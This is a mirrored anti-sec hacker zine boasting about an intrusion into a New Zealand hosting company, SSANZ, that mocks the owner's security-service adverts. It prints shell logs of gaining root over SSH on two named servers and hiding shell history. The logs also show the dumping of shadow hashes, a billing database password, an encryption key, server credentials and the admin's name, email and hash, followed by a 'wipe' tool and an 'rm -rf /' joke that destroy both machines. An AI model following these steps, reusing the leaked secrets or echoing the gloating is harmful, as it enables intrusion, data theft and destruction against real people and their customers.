Mirrors
/
Zines
mirror of https://github.com/fdiskyou/Zines.git
1
0
Fork 0
Code Issues Releases Wiki Activity
Zines/anti-sec/ssanz-pwned.txt

680 lines
26 KiB
Plaintext
Raw Blame History

__ .__
_____ _____/ |_|__| ______ ____ ____
\__ \ / \ __\ | ______ / ___// __ \_/ ___\
/ __ \| | \ | | | /_____/ \___ \\ ___/\ \___
(____ /___| /__| |__| /____ >\___ >\___ >
\/ \/ \/ \/ \/
Some of you have seen a lot of casualties lately in the webhosting scene:
hosting companies being wiped and rm'd at the expense of their clients. While
some of this is collateral damage, we're about to show you, ladies and
gentlemen, that sometimes you aren't pwned because of who you host but what you
say.
Practice what you preach.
- Why SSANZ?
Owned by a kid who claims he can manage, secure and audit servers,
he offers a service that he clearly cannot provide, we are against that.
LoganNZ <http://www.webhostingtalk.com/member.php?u=56008>:
>>Logan of New Zealand. CEO of Server Systems Administration NZ.
>>
>> Signature:
>>Server Systems Administration NZ | SSANZ
>>Got Hacked? | 24/7/365 Remote Emergency Support | Specialist Server Management
>>Affordable Hosting :: Resellers, Shared & Dedicated Server Systems
Server Management $25 - Security & Hardening - $50 <http://www.webhostingtalk.com/showthread.php?t=857383>:
>>Server Management - $25 Per Month
>>
>>- Full Management - Support, & 3rd Party Installs
>>- Monitoring - Included - up to 3 ports.
>>- Emergency Recovery
>>Server Security - $50
>>
>>- Initial Scan & Report
>>- Security Hardening & Security Installs/tweaks.
>>- IDS, Security Monitoring & mod_sec configured.
>>- Finishing Security Scan & SSANZ Custom Scans.
>>
>>
>>Emergency Server Recovery - $150
>>
>>- Recover Hacked Server Systems
>>- Recover deleted data
>>- ANTI-dDOS Services
>>- dDOS Investigation
Security Worries? Security Audits - 50% OFF <http://www.webhostingtalk.com/showthread.php?t=859795>:
>>Get your site/server audited to ensure your business data is
>>secure before you become a statistic.
>>
>>In the past 6 months, e-crime activity reports have increased by
>>45% due to the global economic recession.
>>
>>What is involved in a Full Security Audit?
>>
>>External Security
>>
>> * Scan for Shells/malicious scripts
>> * Scan for vulnerable web content ( permissions, RFI's )
>> * Scans for Vulnerable Server Services
>> * Vulnerable Ports
>> * Testing of TCP handling - dDOS test.
>> * Scan for Vulnerable PHP scripts/mods.
>> * Control Panel Security Audit ( external )
>> * Multiple Unique SSANZ Custom Scans*
>>
>>
>>Internal Security
>>
>> * Permissions/Ownership(s) Review
>> * Apache/Webserver Security
>> * User Account Security & binaries access audit
>> * Local RFI Exploits located/patched.
>> * System Binary Security Audit
>> * Firewall/IPTABLES Audit
>> * Bruteforce detection test & audit
>> * Root Access Authentication Audit
>> * Local PHP Functions Audit
>> * Control Panel Security Audit ( Internal )
>> * Kernel Security Audit
>> * Additional SSANZ Custom Scans/Audit*
We at anti-sec decided to give you a _FREE_ Full Security Audit!*
* `rm -rf /` is included.
anti-sec:~/pwn# ./map ssanz.net
IP: 66.197.143.133 ( osiris.ssanz.net )
WWW: Apache/2.2.11
SSH: SSH-2.0-OpenSSH_4.3
IP: 66.197.204.101 ( devil.ssanz.net )
WWW: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 mod_mono/2.4 mod_auth_passthrough/2.1 mod_bwlimited/1.4
SSH: SSH-2.0-OpenSSH_4.3
anti-sec:~/pwn# cd xpl/
anti-sec:~/pwn/xpl# ./0pen0wn -h 66.197.143.133 -p 22
[+] 0wn0wn - anti-sec group
[+] Target: 66.197.143.133
[+] SSH Port: 22
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
sh-3.2# export HISTFILE=/dev/null
sh-3.2# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh-3.2# uname -a
Linux osiris.ssanz.net 2.6.24.5-grsec-hostnoc-4.0.0-x86_64-libata #1 SMP Mon Aug 25 15:56:12 EDT 2008 x86_64 x86_64 x86_64 GNU/Linux
sh-3.2# head -n1 /etc/shadow
root:$1$t4e0hufX$UH4Q5jTj93EEAODNrSaWO/:14412:0:99999:7:::
sh-3.2# w
03:43:43 up 7 days, 54 min, 1 user, load average: 9.01, 9.78, 10.73
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 125.238.144.224 20:17 7:26m 13:18 13:18 htop
sh-3.2# pwd
/root
sh-3.2# ls -la
total 3008
drwxr-x--- 24 root root 4096 Jul 4 03:43 .
drwxr-xr-x 27 root root 4096 Jun 27 02:49 ..
-rw------- 1 root root 957 Jun 13 07:24 .accesshash
-rw------- 1 root root 1012 Jun 1 10:39 anaconda-ks.cfg
-rw------- 1 root root 15460 Jul 3 23:38 .bash_history
-rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout
-rw-r--r-- 1 root root 191 Jan 6 2007 .bash_profile
-rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc
drwxrwxrwx 3 therockm therockm 4096 Jun 5 07:26 bwm-ng-0.6
-rw-r--r-- 1 root root 141564 Mar 1 2007 bwm-ng-0.6.tar.gz
drwxr-xr-x 3 root root 4096 Nov 15 2006 cmm
-rw-r--r-- 1 root root 18656 Feb 28 11:32 cmm.tgz
drwxr-xr-x 3 root root 4096 Nov 5 2006 cmq
-rw-r--r-- 1 root root 14507 Oct 10 2008 cmq.tgz
drwxr-xr-x 4 root root 4096 Jun 1 14:33 .cpanel
drwxr-xr-x 4 root root 4096 Jun 1 17:10 cpanel3-skel
drwx------ 3 root root 4096 Jun 1 13:50 .cpobjcache
drwxr-xr-x 10 root root 4096 Apr 13 16:17 csf
-rw-r--r-- 1 root root 430121 May 15 12:07 csf.tgz
-rw-r--r-- 1 root root 100 Jan 6 2007 .cshrc
drwx------ 2 root root 4096 Jun 1 13:54 .elinks
-rw-r--r-- 1 root root 1176672 Jul 4 03:40 error_log
-rw-r--r-- 1 root root 16 Jun 3 08:34 .forward
drwx------ 3 root root 4096 Jun 1 10:39 .gconf
drwx------ 2 root root 4096 Jun 1 10:39 .gconfd
drwxr-xr-x 4 root root 4096 Jun 10 23:42 .gem
drwx------ 2 root root 4096 Jun 1 13:55 .gnupg
drwxrwxrwx 5 theweath theweath 4096 Jun 1 17:13 htop-0.8.1
-rw-r--r-- 1 root root 414870 Sep 23 2008 htop-0.8.1.tar.gz
-rw-r--r-- 1 root root 561 Jun 27 02:48 .htoprc
-rw-r--r-- 1 root root 8144 Jun 6 19:23 index.html
-rw-r--r-- 1 root root 4246 Jun 1 10:39 install.log.syslog
drwxr-xr-x 6 500 root 4096 Sep 13 2005 iptraf-3.0.0
-rw-r--r-- 1 root root 0 Jun 27 09:21 iptraf-3.0.0.tar.gz
-rw-r--r-- 1 root root 0 Jun 27 09:22 iptraf-3.0.0.tar.gz.1
-rw-r--r-- 1 root root 0 Jun 27 09:24 iptraf-3.0.0.tar.gz.2
-rw-r--r-- 1 root root 575169 Jun 27 09:26 iptraf-3.0.0.tar.gz.3
drwx------ 6 root root 4096 Jun 1 14:21 .MirrorSearch
-rw------- 1 root root 61 Jun 12 21:04 .my.cnf
-rw------- 1 root root 139 Jul 3 10:51 .mysql_history
-rwxrwxrwx 1 root root 38688 Dec 1 2008 mysqltuner.pl
-rw-r--r-- 1 root root 264 Jul 2 21:43 .pearrc
drwxr-xr-x 2 root root 4096 Jun 1 17:04 public_ftp
drwxr-xr-x 3 root root 4096 Jun 1 17:04 public_html
-rw------- 1 root root 1024 Jun 7 19:50 .rnd
drwx------ 3 root root 4096 Jun 1 14:29 .spamassassin
drwx------ 2 root root 4096 Jun 2 06:41 .ssh
-rw-r--r-- 1 root root 129 Jan 6 2007 .tcshrc
drwxr-xr-x 3 root root 4096 Jun 7 21:54 tmp
-rw------- 1 root root 0 Jun 7 22:01 .trustwavereqs
drw------- 2 root root 4096 Jun 3 08:18 whmrbackups
drw------- 3 root root 4096 Jun 10 08:25 whmrcorebackups
sh-3.2# cat .bash_history
htop
htop
p
htop
tail -f /var/log/secure
tail -f /var/log/secure
[snip]
nano highperformance.conf
service httpd restart
nano highperformance.conf
service httpd restart
nano highperformance.conf
nano httpd.conf
nano php.conf
ls
nano modsec2.conf
ls
[snip]
nano visit4cash.net.conf
cd ..
[snip]
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
ps -aux|grep -i HTTP|wc -l
w
bwm-ng
[snip]
netstat -plan|grep :80|awk {.print $5.}|cut -d: -f 1|sort|uniq -c|sort -n
netstat -plan|grep :80| awk {.print $5.} |cut -d: -f 1|sort|uniq -c|sort -n
netstat -plan|grep :80| awk {.print $5.} |cut -d: -f 1|sort|uniq -c|sort -n
netstat -ntu | awk .{print $5}. | cut -d: -f1 | sort | uniq -c | sort -n
netstat -an | awk '{print $4}' | awk -F":" '{print $2}' | sort -n -u
netstat -nat | awk '{print $6}' | sort | uniq -c | sort -n
netstat -nat |grep 202.54.1.10 | awk '{print $6}' | sort | uniq -c | sort -n
netstat -atun | awk '{print $5}' | cut -d: -f1 | sed -e '/^$/d' |sort | uniq -c | sort -n
[snip]
/sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags ALL ACK,RST,SYN,FIN -j DROP
/sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP
/sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags SYN,RST SYN,RST -j DROP
[snip]
service cups stop
chkconfig cups off
service nfslock stop
chkconfig nfslock off
service rpcidmapd stop
chkconfig rpcidmapd off
service bluetooth stop
chkconfig bluetooth off
service anacron stop
chkconfig anacron off
service avahi-daemon stop
chkconfig avahi-daemon off
service hidd stop
chkconfig hidd off
service pcscd stop
chkconfig pcscd off
[snip]
http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-iso
screen wget http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-iso
htop
screen wget http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-beta-iso
[snip]
wget http://fullhide.info/backup-6.24.2009_18-13-16_fullhide.tar.gz
htop
[snip]
wget ftp://iptraf.seul.org/pub/iptraf/iptraf-3.0.0.tar.gz
wget ftp://the.wiretapped.net/pub/security/network-monitoring/iptraf/iptraf-3.0.00.tar.gz
[snip]
wget http://www.logview.org/logview-install
chmod +x logview-install
./logview-install
rm -rf logview-install
sh-3.2# grep sec /etc/userdomains
affiliatesecrets.wecloak.info: wecloaki
infosecawareness.info: andlyssa
secproxy.info: secproxy
infosecawareness.andly.ssanz.net: andlyssa
greycloud.nakedinsects.com: greyclou
serversecuritynz.com: forumz
orac.nakedinsects.com: oracnz
infernal.nakedinsects.com: infernal
nakedinsects.com: ni
fluffy.nakedinsects.com: fluffy
quickclix.orac.nakedinsects.com: oracnz
seco39.ssanz.net: secossan
sh-3.2# lastlog | grep -v Never
Username Port From Latest
root pts/1 125.238.144.224 Fri Jul 3 20:27:03 -0400 2009
simmobim pts/0 118.69.80.114 Fri Jun 12 00:22:04 -0400 2009
mattss pts/1 118.90.48.0 Sun Jun 21 04:44:58 -0400 2009
etasmtco pts/0 189.31.24.129 Sat Jun 20 10:14:51 -0400 2009
sh-3.2# cd ~billing
sh-3.2# ls -la
total 301252
drwx--x--x 15 billing billing 4096 Jun 28 02:08 .
drwx--x--x 737 root root 20480 Jul 4 00:37 ..
lrwxrwxrwx 1 billing billing 33 Jun 2 01:58 access-logs -> /usr/local/apache/domlogs/billing
-rw------- 1 billing billing 87744924 Jun 14 12:33 backup-6.14.2009_12-32-41_billing.tar.gz
-rw------- 1 billing billing 92931478 Jun 28 02:08 backup-6.28.2009_02-06-29_billing.tar.gz
-rw------- 1 billing billing 84475934 Jun 3 06:33 backup-6.3.2009_06-32-54_billing.tar.gz
-rw------- 1 billing billing 42341015 May 31 21:42 backup-billing9912.tar.gz
-rw-r--r-- 1 billing billing 24 May 27 2008 .bash_logout
-rw-r--r-- 1 billing billing 176 May 27 2008 .bash_profile
-rw-r--r-- 1 billing billing 124 May 27 2008 .bashrc
-rw------- 1 billing billing 17 May 27 2008 .contactemail
drwxr-xr-x 5 billing billing 4096 May 8 02:48 .cpanel
-rw-r----- 1 billing billing 0 Apr 4 06:32 cpbackup-exclude.conf
drwxr-xr-x 2 billing billing 4096 Jun 2 01:57 cpmove.psql
drwxr-xr-x 3 billing billing 4096 Nov 12 2008 cpmove.psql.1240007789
drwxr-xr-x 2 billing billing 4096 Apr 16 23:24 cpmove.psql.1243922290
-rw-r--r-- 1 billing billing 532304 Jul 4 03:45 error_log
drwxr-x--- 4 billing mail 4096 Jan 19 21:39 etc
drwxr-x--- 2 billing nobody 4096 May 27 2008 .htpasswds
-rw-r--r-- 1 billing billing 7 Nov 12 2008 .lang
-rw------- 1 billing billing 15 Jun 28 02:07 .lastlogin
drwxrwx--- 10 billing billing 4096 Jul 2 21:43 mail
drwxr-xr-x 4 billing billing 4096 Nov 12 2008 .mozilla
drwxr-xr-x 3 billing billing 4096 Apr 29 2008 public_ftp
drwxr-x--- 24 billing nobody 4096 Jun 28 02:55 public_html
drwx------ 4 billing billing 4096 Jun 7 21:53 ssl
drwxr-xr-x 7 billing billing 4096 Feb 25 17:59 tmp
drwx------ 2 billing billing 4096 May 27 2008 .trash
lrwxrwxrwx 1 billing billing 11 Jun 2 01:58 www -> public_html
-rw-r--r-- 1 billing billing 658 May 27 2008 .zshrc
sh-3.2# cd www/
sh-3.2# ls
admin banned.php configuressl.php domainchecker.php init.php logout.php postinfo.html templates
viewticket.php whois.php
affiliates.php billing contact.php downloads installmingchowping modules _private templates_c _vti_bin
aff.php cart.php creditcard.php downloads.php knowledgebase.php networkissues.php register.php tutorials.php _vti_cnf
announcements.php cgi-bin dbconnect.php htaccess.txt lang networkissuesrss.php serverstatus.php upgrade
_vti_inf.html
announcementsrss.php clientarea.php display.php images libs order.php status upgrade.php _vti_log
announcements.xml configuration.php dl.php includes link.php passwordreminder.php submitticket.php viewemail.php _vti_pvt
attachments configuration.php.new dologin.php index.php login.php pipe supporttickets.php viewinvoice.php _vti_txt
sh-3.2# cat configuration.php
<?php
$license="93881365561d";
$db_host = "localhost";
$db_username = "billing_billusr";
$db_password = "X2qL6:qWCCb6";
$db_name = "billing_billing";
$cc_encryption_hash = "57jR9sVyPKcDvZ4Ppy4I56sjYLI6mmEjhPQJ1sEAqBw7O952JlkTlrAbzLLmTx9K";
$templates_compiledir = "templates_c/";
?>
sh-3.2# mysql
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 11021136
Server version: 5.0.81-community MySQL Community Edition (GPL)
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> use billing_billing;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+----------------------------+
| Tables_in_billing_billing |
+----------------------------+
| mod_ipmanager |
| mod_ipmonitor |
| tblaccounts |
| tblactivitylog |
| tbladdons |
| tbladminlog |
| tbladminperms |
| tbladminroles |
| tbladmins |
| tbladminsecurityquestions |
| tblaffiliates |
| tblaffiliatesaccounts |
| tblaffiliateshistory |
| tblaffiliatespending |
| tblaffiliateswithdrawals |
| tblannouncements |
| tblbannedemails |
| tblbannedips |
| tblbillableitems |
| tblbrowserlinks |
| tblcalendar |
| tblcancelrequests |
| tblclientgroups |
| tblclients |
| tblconfiguration |
| tblcontacts |
| tblcredit |
| tblcurrencies |
| tblcustomfields |
| tblcustomfieldsvalues |
| tbldomainpricing |
| tbldomains |
| tbldomainsadditionalfields |
| tbldownloadcats |
| tbldownloads |
| tblemails |
| tblemailtemplates |
| tblfraud |
| tblgatewaylog |
| tblhosting |
| tblhostingaddons |
| tblhostingconfigoptions |
| tblinvoiceitems |
| tblinvoices |
| tblknowledgebase |
| tblknowledgebasecats |
| tblknowledgebaselinks |
| tbllinks |
| tblnetworkissues |
| tblnotes |
| tblorders |
| tblpaymentgateways |
| tblpricing |
| tblproductconfiggroups |
| tblproductconfiglinks |
| tblproductconfigoptions |
| tblproductconfigoptionssub |
| tblproductgroups |
| tblproducts |
| tblpromotions |
| tblquoteitems |
| tblquotes |
| tblregistrars |
| tblservers |
| tblsslorders |
| tbltax |
| tblticketbreaklines |
| tblticketdepartments |
| tblticketescalations |
| tblticketlog |
| tblticketmaillog |
| tblticketnotes |
| tblticketpredefinedcats |
| tblticketpredefinedreplies |
| tblticketreplies |
| tbltickets |
| tblticketspamfilters |
| tbltodolist |
| tblupgrades |
| tblwhoislog |
+----------------------------+
80 rows in set (0.00 sec)
mysql> select name,ipaddress,hostname,username,password from tblservers;
+--------------+----------------+------------------+----------+--------------------------------------------------------------------------+
| name | ipaddress | hostname | username | password |
+--------------+----------------+------------------+----------+--------------------------------------------------------------------------+
| Osiris | 66.197.143.133 | Osiris.ssanz.net | ssanz | J4WILwNJpxR0KhyuPspLOT37zLzLrZ1wyqctabXg3co= |
| Osiris-Radio | 66.197.143.133 | Osiris.ssanz.net | root | +V876e3z7tGn9HXEcOG1TJVPaSsGbj31MnsZ2lw52buNutqcpfBhrPVsKdDssqrh7eDF8g== |
| Devil | 66.197.204.101 | devil.ssanz.net | root | n/a/WSvQJp/++la5CREbl9QijpppzdxP0GjijQRXst2nag9E9PuTVrRO3A== |
+--------------+----------------+------------------+----------+--------------------------------------------------------------------------+
3 rows in set (0.00 sec)
mysql> select firstname,lastname,email,username,password from tbladmins;
+-----------+----------+-----------------+----------+----------------------------------+
| firstname | lastname | email | username | password |
+-----------+----------+-----------------+----------+----------------------------------+
| Logan | Douglas | Logan@ssanz.net | Admin | c6df529826cf16ac5bedb424d8ac972b |
+-----------+----------+-----------------+----------+----------------------------------+
1 row in set (0.06 sec)
mysql> quit
Bye
sh-3.2# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda5 2.0G 477M 1.4G 26% /
/dev/sda8 875G 147G 684G 18% /home
/dev/sda3 9.7G 6.8G 2.5G 74% /usr
/dev/sda2 9.7G 7.0G 2.3G 76% /var
/dev/sda1 99M 23M 72M 24% /boot
/dev/sda6 996M 64M 881M 7% /tmp
tmpfs 3.9G 0 3.9G 0% /dev/shm
/dev/sdb1 459G 163G 273G 38% /backup
sh-3.2# ./wipe
sh-3.2# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda5 64Z 64Z 1.5G 100% /
/dev/sda8 64Z 64Z 729G 100% /home
/dev/sda3 64Z 64Z 3.0G 100% /usr
/dev/sda2 64Z 64Z 3.0G 100% /var
/dev/sda1 16Z 16Z 0 100% /boot
/dev/sda6 64Z 64Z 933M 100% /tmp
tmpfs 3.9G 0 3.9G 0% /dev/shm
/dev/sdb1 64Z 64Z 296G 100% /backup
sh-3.2# exit
exit
-----------------------------------
osiris [ DOWN ]
devil [ UP ]
-----------------------------------
anti-sec:~/pwn/xpl# ./0pen0wn -h 66.197.204.101 -p 22
[+] 0wn0wn - anti-sec group
[+] Target: 66.197.204.101
[+] SSH Port: 22
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
sh-3.2# export HISTFILE=/dev/null
sh-3.2# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh-3.2# uname -a
Linux devil.ssanz.net 2.6.24.5-grsec-hostnoc-4.0.0-x86_64-libata #1 SMP Mon Aug 25 15:56:12 EDT 2008 x86_64 x86_64 x86_64 GNU/Linux
sh-3.2# head -n1 /etc/shadow
root:$1$BitobdhB$SAscpWG4O51UZQzxpBxbI1:14407:0:99999:7:::
sh-3.2# w
04:10:20 up 4 days, 12:11, 1 user, load average: 3.25, 2.09, 1.68
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 125.238.144.224 20:18 7:51m 6:38 6:38 htop
sh-3.2# pwd
/root
sh-3.2# ls -la
total 1232
drwxr-x--- 23 root root 4096 Jul 4 04:06 .
drwxr-xr-x 25 root root 4096 Jun 29 14:33 ..
-rw------- 1 root root 957 Jun 13 05:20 .accesshash
-rw------- 1 root root 937 Jun 12 00:01 anaconda-ks.cfg
-rw------- 1 root root 7258 Jun 30 10:03 .bash_history
-rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout
-rw-r--r-- 1 root root 191 Jan 6 2007 .bash_profile
-rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc
drwxrwxrwx 3 1000 1000 4096 Jun 12 04:45 bwm-ng-0.6
-rw-r--r-- 1 root root 141564 Mar 1 2007 bwm-ng-0.6.tar.gz
drwxr-xr-x 3 root root 4096 Nov 5 2006 cmq
-rw-r--r-- 1 root root 14507 Oct 10 2008 cmq.tgz
drwxr-xr-x 4 root root 4096 Jun 12 02:51 .cpanel
drwxr-xr-x 4 root root 4096 Jun 12 03:26 cpanel3-skel
drwx------ 3 root root 4096 Jun 12 00:17 .cpobjcache
drwxr-xr-x 2 root root 4096 Aug 21 2006 cse
-rw-r--r-- 1 root root 12207 Oct 10 2008 cse.tgz
drwxr-xr-x 10 root root 4096 Jun 5 05:05 csf
-rw-r--r-- 1 root root 431490 Jun 5 10:52 csf.tgz
-rw-r--r-- 1 root root 100 Jan 6 2007 .cshrc
drwx------ 2 root root 4096 Jun 12 01:51 .elinks
-rw-r--r-- 1 root root 16 Jun 13 15:33 .forward
drwx------ 3 root root 4096 Jun 11 23:59 .gconf
drwx------ 2 root root 4096 Jun 11 23:59 .gconfd
drwxr-xr-x 4 root root 4096 Jun 12 04:29 .gem
drwx------ 2 root root 4096 Jun 12 01:53 .gnupg
drwxrwxrwx 6 1002 1002 4096 Jun 12 04:24 htop-0.8.1
-rw-r--r-- 1 root root 414870 Sep 23 2008 htop-0.8.1.tar.gz
-rw-r--r-- 1 root root 561 Jun 12 23:31 .htoprc
-rw-r--r-- 1 root root 4239 Jun 12 00:01 install.log.syslog
drwx------ 6 root root 4096 Jun 12 02:33 .MirrorSearch
-rw------- 1 root root 37 Jun 12 02:11 .my.cnf
drwxr-xr-x 3 1000 1000 4096 Jun 12 05:42 mytop-1.6
-rw-r--r-- 1 root root 19720 Feb 16 2007 mytop-1.6.tar.gz
-rw-r--r-- 1 root root 264 Jun 23 00:23 .pearrc
drwxr-xr-x 2 root root 4096 Jun 12 03:21 public_ftp
drwxr-xr-x 3 root root 4096 Jun 12 03:21 public_html
-rw------- 1 root root 1024 Jun 12 02:50 .rnd
drwx------ 3 root root 4096 Jun 12 02:41 .spamassassin
drwx------ 2 root root 4096 Jun 22 09:11 .ssh
-rw-r--r-- 1 root root 129 Jan 6 2007 .tcshrc
drwxr-xr-x 3 root root 4096 Jun 12 02:40 tmp
drwxr-xr-x 2 root root 4096 Jun 16 19:23 .wapi
sh-3.2# cat .bash_history
sh hninst.sh
passwd
fdisk -l
exit
w
history
screen -ls
screen -r 2785.pts-0.devil
exit
wget http://merovingian.net.nz/htop-0.8.1.tar.gz
[snip]
csf -a 125.238.144.110
exit
cd /home
ls
wget http://visit4cash.net/backup-6.12.2009_06-46-12_visit4ca.tar.gz
[snip]
wget http://visit4cash.net/mainfiles.tar.gz
mv mainfiles.tar.gz /home/visit4ca/public_html
cd /home
cd visit4ca
cd public_html
ls
tar zxvf mainfiles.tar.gz
[snip]
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.38.206.233
csf --restart
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 118.94.59.33
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
[snip]
screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Live/i686/Fedora-11-i686-Live.iso
screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Fedora/x86_64/iso/Fedora-11-x86_64-DVD.iso
screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Fedora/x86_64/iso/Fedora-11-x86_64-netinst.iso
sh-3.2# cat /etc/userdomains
advertising.ssanz.net: adserver
forums.visit4cash.net: forumsv4
megacashzone.com: megacash
visit4cash.net: visit4ca
seanone.com: seanonec
backup2.ssanz.net: backup2
*: nobody
sh-3.2# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda3 31G 7.5G 22G 26% /
/dev/sdb1 452G 35G 394G 9% /home
/dev/sda1 99M 23M 72M 24% /boot
tmpfs 495M 4.0K 495M 1% /dev/shm
/usr/tmpDSK 485M 14M 446M 3% /tmp
sh-3.2# who
root pts/0 2009-07-03 20:18 (125.238.144.224)
sh-3.2# ./wipe
sh-3.2# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda3 64Z 64Z 24G 100% /
/dev/sdb1 64Z 64Z 417G 100% /home
/dev/sda1 16Z 16Z 77M 100% /boot
tmpfs 495M 4.0K 495M 1% /dev/shm
/usr/tmpDSK 485M 14M 446M 3% /tmp
sh-3.2# exit
exit
-----------------------------------
osiris [ DOWN ]
devil [ DOWN ]
-----------------------------------
Once again, practice what you preach. Don't claim to be something you're not.
Most importantly, don't go after us. We're not the problem. What you say does
not align AT ALL with what you actually do with your servers.
Fix that first, you dig?
~ There will always be no way out.
Reference in New Issue View Git Blame Copy Permalink